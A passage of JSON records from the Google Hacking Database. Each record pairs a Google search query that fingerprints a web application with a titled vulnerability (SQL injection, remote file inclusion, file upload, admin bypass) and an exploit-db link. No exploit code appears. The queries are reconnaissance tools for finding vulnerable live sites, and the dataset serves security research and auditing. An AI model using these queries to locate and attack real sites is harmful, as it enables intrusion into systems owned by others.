http://www.exploit-db.com/exploits/5463" }, { "signatureReferenceNumber": "2206", "link": "https://www.exploit-db.com/ghdb/2206/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:directory.php%3Fax%3Dlist", "shortDescription": "allinurl:directory.php?ax=list", "textualDescription": "Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: http://www.exploit-db.com/exploits/4185" }, { "signatureReferenceNumber": "2207", "link": "https://www.exploit-db.com/ghdb/2207/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:w3.php%3FnodeId%3D", "shortDescription": "inurl:w3.php?nodeId=", "textualDescription": "Aspect Ratio CMS Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15205" }, { "signatureReferenceNumber": "2208", "link": "https://www.exploit-db.com/ghdb/2208/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=VS-G%C3%A4stebuch+V.+%C2%A9", "shortDescription": "VS-G\u00e4stebuch V. \u00a9", "textualDescription": "S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: http://www.exploit-db.com/exploits/3328" }, { "signatureReferenceNumber": "2209", "link": "https://www.exploit-db.com/ghdb/2209/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Uebimiau+Webmail+v3.2.0-1.8", "shortDescription": "Uebimiau Webmail v3.2.0-1.8", "textualDescription": "Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: http://www.exploit-db.com/exploits/8944" }, { "signatureReferenceNumber": "2210", "link": "https://www.exploit-db.com/ghdb/2210/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%C3%82%C2%A9+2007+by+Lama+Software+-+Accomm+Solutions+GmbH+%26+Co.+KG", "shortDescription": "\u00c2\u00a9 2007 by Lama Software - Accomm Solutions GmbH & Co. KG", "textualDescription": "Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: http://www.exploit-db.com/exploits/4955" }, { "signatureReferenceNumber": "2211", "link": "https://www.exploit-db.com/ghdb/2211/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22ATutor+1.6.4%22", "shortDescription": "\"ATutor 1.6.4\"", "textualDescription": "ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: http://www.exploit-db.com/exploits/11685" }, { "signatureReferenceNumber": "2213", "link": "https://www.exploit-db.com/ghdb/2213/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Search+|+Invite+|+Mail+|+Blog+|+Forum%22", "shortDescription": "\"Search | Invite | Mail | Blog | Forum\"", "textualDescription": "Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: http://www.exploit-db.com/exploits/4622" }, { "signatureReferenceNumber": "2214", "link": "https://www.exploit-db.com/ghdb/2214/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22index.php%3Foption%3Dcom_portfolio%22", "shortDescription": "inurl:\"index.php?option=com_portfolio\"", "textualDescription": "Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5139" }, { "signatureReferenceNumber": "2215", "link": "https://www.exploit-db.com/ghdb/2215/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+Article+DashBoard", "shortDescription": "Powered by Article DashBoard", "textualDescription": "Article Friendly SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11530" }, { "signatureReferenceNumber": "2216", "link": "https://www.exploit-db.com/ghdb/2216/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=elkagroup+-+Image+Gallery+v1.0+-++All+right+reserved", "shortDescription": "elkagroup - Image Gallery v1.0 - All right reserved", "textualDescription": "elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: http://www.exploit-db.com/exploits/8514" }, { "signatureReferenceNumber": "2219", "link": "https://www.exploit-db.com/ghdb/2219/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:post.php%3FCategory%3DGarage", "shortDescription": "inurl:post.php?Category=Garage", "textualDescription": "GarageSales Remote Upload Vulnerability: http://www.exploit-db.com/exploits/12128" }, { "signatureReferenceNumber": "2221", "link": "https://www.exploit-db.com/ghdb/2221/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=intext:%22Powered+by+CLscript.com%22", "shortDescription": "intext:\"Powered by CLscript.com\"", "textualDescription": "CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: http://www.exploit-db.com/exploits/12423" }, { "signatureReferenceNumber": "2222", "link": "https://www.exploit-db.com/ghdb/2222/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Send+amazing+greetings+to+your+friends+and+relative!%22", "shortDescription": "\"Send amazing greetings to your friends and relative!\"", "textualDescription": "greeting card Remote Upload Vulnerability: http://www.exploit-db.com/exploits/13751" }, { "signatureReferenceNumber": "2223", "link": "https://www.exploit-db.com/ghdb/2223/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22index.php%3Foption%3Dcom_oziogallery%22", "shortDescription": "inurl:\"index.php?option=com_oziogallery\"", "textualDescription": "Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: http://www.exploit-db.com/exploits/14462" }, { "signatureReferenceNumber": "2224", "link": "https://www.exploit-db.com/ghdb/2224/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+Content+Injector+v1.53%22", "shortDescription": "\"Powered by Content Injector v1.53\"", "textualDescription": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: http://www.exploit-db.com/exploits/4706" }, { "signatureReferenceNumber": "2225", "link": "https://www.exploit-db.com/ghdb/2225/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:tabid/176/Default.aspx+OR+inurl:portals/0/", "shortDescription": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "textualDescription": "DotNetNuke Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12700" }, { "signatureReferenceNumber": "2226", "link": "https://www.exploit-db.com/ghdb/2226/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22click.php%3Fhostid%3D%22", "shortDescription": "inurl:\"click.php?hostid=\"", "textualDescription": "Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: http://www.exploit-db.com/exploits/6909" }, { "signatureReferenceNumber": "2227", "link": "https://www.exploit-db.com/ghdb/2227/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:/tiny_mce/plugins/filemanager/", "shortDescription": "inurl:/tiny_mce/plugins/filemanager/", "textualDescription": "TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15194" }, { "signatureReferenceNumber": "2229", "link": "https://www.exploit-db.com/ghdb/2229/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22search_results.php%3Fbrowse%3D1%22", "shortDescription": "inurl:\"search_results.php?browse=1\"", "textualDescription": "SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: http://www.exploit-db.com/exploits/12438" }, { "signatureReferenceNumber": "2230", "link": "https://www.exploit-db.com/ghdb/2230/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22powered+by+fuzzylime%22", "shortDescription": "\"powered by fuzzylime\"", "textualDescription": "fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: http://www.exploit-db.com/exploits/5260" }, { "signatureReferenceNumber": "2231", "link": "https://www.exploit-db.com/ghdb/2231/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+ThinkAdmin", "shortDescription": "Powered by ThinkAdmin", "textualDescription": "ThinkAdmin (page.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11296" }, { "signatureReferenceNumber": "2232", "link": "https://www.exploit-db.com/ghdb/2232/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=phpBazar+Ver.+2.1.0", "shortDescription": "phpBazar Ver. 2.1.0", "textualDescription": "phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: http://www.exploit-db.com/exploits/10233" }, { "signatureReferenceNumber": "2233", "link": "https://www.exploit-db.com/ghdb/2233/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:gotourl.php%3Fid%3D", "shortDescription": "inurl:gotourl.php?id=", "textualDescription": "PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: http://www.exploit-db.com/exploits/6839" }, { "signatureReferenceNumber": "2234", "link": "https://www.exploit-db.com/ghdb/2234/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22module%3Dhelpcenter%22", "shortDescription": "inurl:\"module=helpcenter\"", "textualDescription": "Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion - CVE: 2010-1652: http://www.exploit-db.com/exploits/12421" }, { "signatureReferenceNumber": "2235", "link": "https://www.exploit-db.com/ghdb/2235/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+By+PHPhotoalbum", "shortDescription": "Powered By PHPhotoalbum", "textualDescription": "PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: http://www.exploit-db.com/exploits/10584" }, { "signatureReferenceNumber": "2236", "link": "https://www.exploit-db.com/ghdb/2236/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Eyeland+Studio+Inc.+All+Rights+Reserved.%22", "shortDescription": "\"Eyeland Studio Inc. All Rights Reserved.\"", "textualDescription": "Eyeland Studio Inc. SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13855" }, { "signatureReferenceNumber": "2237", "link": "https://www.exploit-db.com/ghdb/2237/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Gallery+powered+by+fMoblog%22", "shortDescription": "\"Gallery powered by fMoblog\"", "textualDescription": "Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: http://www.exploit-db.com/exploits/8229" }, { "signatureReferenceNumber": "2239", "link": "https://www.exploit-db.com/ghdb/2239/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+Orca+Interactive+Forum+Script%22", "shortDescription": "\"Powered by Orca Interactive Forum Script\"", "textualDescription": "Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: http://www.exploit-db.com/exploits/5955" }, { "signatureReferenceNumber": "2240", "link": "https://www.exploit-db.com/ghdb/2240/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+Info+Fisier", "shortDescription": "Powered by Info Fisier", "textualDescription": "Info Fisier v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10726" }, { "signatureReferenceNumber": "2242", "link": "https://www.exploit-db.com/ghdb/2242/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22browsecats.php%3Fcid%3D%22", "shortDescription": "inurl:\"browsecats.php?cid=\"", "textualDescription": "SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: http://www.exploit-db.com/exploits/12439" }, { "signatureReferenceNumber": "2243", "link": "https://www.exploit-db.com/ghdb/2243/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+MySpace+Content+Zone%22", "shortDescription": "\"Powered by MySpace Content Zone\"", "textualDescription": "MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: http://www.exploit-db.com/exploits/4741" }, { "signatureReferenceNumber": "2244", "link": "https://www.exploit-db.com/ghdb/2244/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:+%22com_actualite%22", "shortDescription": "allinurl: \"com_actualite\"", "textualDescription": "Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: http://www.exploit-db.com/exploits/5337" }, { "signatureReferenceNumber": "2245", "link": "https://www.exploit-db.com/ghdb/2245/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22com_book%22", "shortDescription": "inurl:\"com_book\"", "textualDescription": "Joomla Component com_book SQL injection Vulnerability: http://www.exploit-db.com/exploits/11213" }, { "signatureReferenceNumber": "2246", "link": "https://www.exploit-db.com/ghdb/2246/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22powered+by+AllMyGuests%22", "shortDescription": "\"powered by AllMyGuests\"", "textualDescription": "AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: http://www.exploit-db.com/exploits/5469" }, { "signatureReferenceNumber": "2248", "link": "https://www.exploit-db.com/ghdb/2248/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl+:+/web3news/", "shortDescription": "allinurl : /web3news/", "textualDescription": "Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: http://www.exploit-db.com/exploits/2269" }, { "signatureReferenceNumber": "2249", "link": "https://www.exploit-db.com/ghdb/2249/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+BoutikOne%C2%AE", "shortDescription": "Powered by BoutikOne\u00ae", "textualDescription": "BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: http://www.exploit-db.com/exploits/15049" }, { "signatureReferenceNumber": "2251", "link": "https://www.exploit-db.com/ghdb/2251/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22+Powered+by+Xpoze+%22", "shortDescription": "\" Powered by Xpoze \"", "textualDescription": "Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: http://www.exploit-db.com/exploits/7432" }, { "signatureReferenceNumber": "2253", "link": "https://www.exploit-db.com/ghdb/2253/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+ArticleMS+from+ArticleTrader", "shortDescription": "Powered by ArticleMS from ArticleTrader", "textualDescription": "Article Management System 2.1.2 Reinstall Vulnerability: http://www.exploit-db.com/exploits/12858" }, { "signatureReferenceNumber": "2254", "link": "https://www.exploit-db.com/ghdb/2254/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:%22macgurublog.php%3Fuid%3D%22", "shortDescription": "allinurl:\"macgurublog.php?uid=\"", "textualDescription": "e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: http://www.exploit-db.com/exploits/6856" }, { "signatureReferenceNumber": "2255", "link": "https://www.exploit-db.com/ghdb/2255/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22powered+by+Sniggabo+CMS%22+inurl:article.php%3Fid", "shortDescription": "\"powered by Sniggabo CMS\" inurl:article.php?id", "textualDescription": "Sniggabo CMS (article.php id) Remote SQL Injection: http://www.exploit-db.com/exploits/8933" }, { "signatureReferenceNumber": "2256", "link": "https://www.exploit-db.com/ghdb/2256/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22tr.php%3Fid%3D%22+Short+Url+%26+Url+Tracker", "shortDescription": "inurl:\"tr.php?id=\" Short Url & Url Tracker", "textualDescription": "YourFreeWorld Short Url & Url Tracker (id) SQL Injection Vuln - CVE: 2008-4885: http://www.exploit-db.com/exploits/6940" }, { "signatureReferenceNumber": "2257", "link": "https://www.exploit-db.com/ghdb/2257/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=powered+by+AirvaeCommerce+3.0", "shortDescription": "powered by AirvaeCommerce 3.0", "textualDescription": "AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: http://www.exploit-db.com/exploits/5689" }, { "signatureReferenceNumber": "2258", "link": "https://www.exploit-db.com/ghdb/2258/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:+%22tops_top.php%3F+id_cat+%3D%22", "shortDescription": "inurl: \"tops_top.php? id_cat =\"", "textualDescription": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: http://www.exploit-db.com/exploits/6044" }, { "signatureReferenceNumber": "2259", "link": "https://www.exploit-db.com/ghdb/2259/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=PHPEmailManager", "shortDescription": "PHPEmailManager", "textualDescription": "PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: http://www.exploit-db.com/exploits/9470" }, { "signatureReferenceNumber": "2260", "link": "https://www.exploit-db.com/ghdb/2260/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+By+0DayDB+v2.3%22", "shortDescription": "\"Powered By 0DayDB v2.3\"", "textualDescription": "0DayDB 2.3 (delete id) Remote Admin Bypass: http://www.exploit-db.com/exploits/4896" }, { "signatureReferenceNumber": "2261", "link": "https://www.exploit-db.com/ghdb/2261/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+ExBB+%22", "shortDescription": "\"Powered by ExBB \"", "textualDescription": "ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: http://www.exploit-db.com/exploits/2273" }, { "signatureReferenceNumber": "2262", "link": "https://www.exploit-db.com/ghdb/2262/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+Locazolist+Copyright+%C2%A9+2006%22", "shortDescription": "\"Powered by Locazolist Copyright \u00a9 2006\"", "textualDescription": "LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: http://www.exploit-db.com/exploits/3073" }, { "signatureReferenceNumber": "2264", "link": "https://www.exploit-db.com/ghdb/2264/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=intext:%22Powered+by+Max.Blog%22", "shortDescription": "intext:\"Powered by Max.Blog\"", "textualDescription": "Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7885" }, { "signatureReferenceNumber": "2265", "link": "https://www.exploit-db.com/ghdb/2265/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+Active+PHP+Bookmarks+v1.3%22+inurl:.view_group.php%3Fid%3D", "shortDescription": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "textualDescription": "Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/10597" }, { "signatureReferenceNumber": "2266", "link": "https://www.exploit-db.com/ghdb/2266/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22txx+cms%22", "shortDescription": "\"txx cms\"", "textualDescription": "Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: http://www.exploit-db.com/exploits/4381" }, { "signatureReferenceNumber": "2267", "link": "https://www.exploit-db.com/ghdb/2267/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by:+XP+Book+v3.0", "shortDescription": "Powered by: XP Book v3.0", "textualDescription": "XP Book v3.0 login Admin: http://www.exploit-db.com/exploits/10621" }, { "signatureReferenceNumber": "2268", "link": "https://www.exploit-db.com/ghdb/2268/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Powered+by+ispCP+Omega%22", "shortDescription": "\"Powered by ispCP Omega\"", "textualDescription": "ispCP Omega 1.0.4 Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11681" }, { "signatureReferenceNumber": "2269", "link": "https://www.exploit-db.com/ghdb/2269/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22printer.asp%3Fforum%3D%22", "shortDescription": "inurl:\"printer.asp?forum=\"", "textualDescription": "ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: http://www.exploit-db.com/exploits/4609" }, { "signatureReferenceNumber": "2270", "link": "https://www.exploit-db.com/ghdb/2270/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22com_ownbiblio%22+catalogue", "shortDescription": "inurl:\"com_ownbiblio\" catalogue", "textualDescription": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: http://www.exploit-db.com/exploits/6730" }, { "signatureReferenceNumber": "2271", "link": "https://www.exploit-db.com/ghdb/2271/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22This+site+is+powered+by+CMS+Made+Simple+version+1.%22", "shortDescription": "\"This site is powered by CMS Made Simple version 1.\"", "textualDescription": "CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: http://www.exploit-db.com/exploits/9407" }, { "signatureReferenceNumber": "2272", "link": "https://www.exploit-db.com/ghdb/2272/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22CMS+Webmanager-pro%22", "shortDescription": "\"CMS Webmanager-pro\"", "textualDescription": "CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: http://www.exploit-db.com/exploits/5641" }, { "signatureReferenceNumber": "2274", "link": "https://www.exploit-db.com/ghdb/2274/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22/geeklog/%22", "shortDescription": "inurl:\"/geeklog/\"", "textualDescription": "GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15277" }, { "signatureReferenceNumber": "2276", "link": "https://www.exploit-db.com/ghdb/2276/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=+%22Jax+Calendar+v1.34+by+Jack+(tR),+www.jtr.de/scripting/php%22", "shortDescription": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "textualDescription": "Jax Calendar 1.34 Remote Admin Access: http://www.exploit-db.com/exploits/10835" }, { "signatureReferenceNumber": "2277", "link": "https://www.exploit-db.com/ghdb/2277/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=allinurl:+%22index+php+p+shop%22categ", "shortDescription": "allinurl: \"index php p shop\"categ", "textualDescription": "Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5412" }, { "signatureReferenceNumber": "2278", "link": "https://www.exploit-db.com/ghdb/2278/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by+Platinum+7.6.b.5", "shortDescription": "Powered by Platinum 7.6.b.5", "textualDescription": "PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: http://www.exploit-db.com/exploits/4563" }, { "signatureReferenceNumber": "2280", "link": "https://www.exploit-db.com/ghdb/2280/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Rash+Version:+1.2.1", "shortDescription": "Rash Version: 1.2.1", "textualDescription": "RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8433" }, { "signatureReferenceNumber": "2281", "link": "https://www.exploit-db.com/ghdb/2281/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by:+mevin+productions", "shortDescription": "Powered by: mevin productions", "textualDescription": "Basic PHP Events Lister 2 Add Admin: http://www.exploit-db.com/exploits/10515" }, { "signatureReferenceNumber": "2282", "link": "https://www.exploit-db.com/ghdb/2282/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:/webCal3_detail.asp%3Fevent_id%3D", "shortDescription": "inurl:/webCal3_detail.asp?event_id=", "textualDescription": "WebCal (webCal3_detail.asp event_id) SQL Injection Vulnerability - CVE: 2009-1945: http://www.exploit-db.com/exploits/8857" }, { "signatureReferenceNumber": "2284", "link": "https://www.exploit-db.com/ghdb/2284/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:classifieds/view.php%3Fcategory%3D", "shortDescription": "inurl:classifieds/view.php?category=", "textualDescription": "YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: http://www.exploit-db.com/exploits/6945" }, { "signatureReferenceNumber": "2285", "link": "https://www.exploit-db.com/ghdb/2285/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22Signkorn+Guestbook+1.3%22", "shortDescription": "\"Signkorn Guestbook 1.3\"", "textualDescription": "Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: http://www.exploit-db.com/exploits/2354" }, { "signatureReferenceNumber": "2287", "link": "https://www.exploit-db.com/ghdb/2287/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22catalog/product/detail.php%3Fcat%3D%22", "shortDescription": "inurl:\"catalog/product/detail.php?cat=\"", "textualDescription": "Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: http://www.exploit-db.com/exploits/12467" }, { "signatureReferenceNumber": "2288", "link": "https://www.exploit-db.com/ghdb/2288/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:+user_info.php%3Fuser_id%3D+%22++Or++%22+inurl:+index.php%3Fcatid%3D+%22", "shortDescription": "inurl: user_info.php?user_id= \" Or \" inurl: index.php?catid= \"", "textualDescription": "Free Advertisment cms (user_info.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12572" }, { "signatureReferenceNumber": "2289", "link": "https://www.exploit-db.com/ghdb/2289/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=Powered+by:Traidnt+Gallery+Version+1.0.", "shortDescription": "Powered by:Traidnt Gallery Version 1.0.", "textualDescription": "Traidnt Gallery add Admin: http://www.exploit-db.com/exploits/10629" }, { "signatureReferenceNumber": "2290", "link": "https://www.exploit-db.com/ghdb/2290/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=inurl:%22powered+by+eggblog%22", "shortDescription": "inurl:\"powered by eggblog\"", "textualDescription": "Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: http://www.exploit-db.com/exploits/1842" }, { "signatureReferenceNumber": "2291", "link": "https://www.exploit-db.com/ghdb/2291/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&source=hp&biw=1280&bih=685&q=%22pForum+1.30%22", "shortDescription": "\"pForum 1.30\"", "textualDescription": "pForum 1.30 (showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: http://www.exploit-db.com/exploits/6442" }, { "signatureReferenceNumber": 